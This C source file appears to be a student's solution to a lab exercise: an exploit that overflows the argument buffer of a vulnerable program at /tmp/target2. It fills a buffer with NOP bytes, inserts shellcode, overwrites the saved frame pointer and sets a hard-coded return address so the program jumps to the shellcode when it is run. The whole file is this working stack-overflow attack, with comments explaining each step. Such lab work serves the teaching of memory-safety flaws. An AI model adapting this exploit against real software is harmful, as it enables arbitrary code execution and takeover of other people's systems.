#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include "shellcode.h"

#define TARGET "/tmp/target2"

int main(void)
{
  char *args[3];
  char *env[1];

  args[0] = TARGET; args[1] = "hi there"; args[2] = NULL;
  env[0] = NULL;

  /* Start custom sploit code - help obtained from screendump.txt file */
  args[1] = malloc(202);
  memset(args[1], 0x90, 201);
  args[1][201] = '\0';
  memcpy(args[1] + 40, shellcode, strlen(shellcode)); // be sure to start the malicious code far enough into the buffer
 

  *(unsigned int *)(args[1] + 200) = 00; // overflow and modify the old EBP to point to a place in the buffer. 
  *(unsigned int *)(args[1] + 32) = 0xBFFFFD28; // modify the fake return EIP to point to the malicious code (shellcode) at the specified address, 40 bytes into the buffer (located at 0xBFFFFCE8)
  
/* End custom sploit code */

  if (0 > execve(TARGET, args, env))
    fprintf(stderr, "execve failed.\n");

  return 0;
}
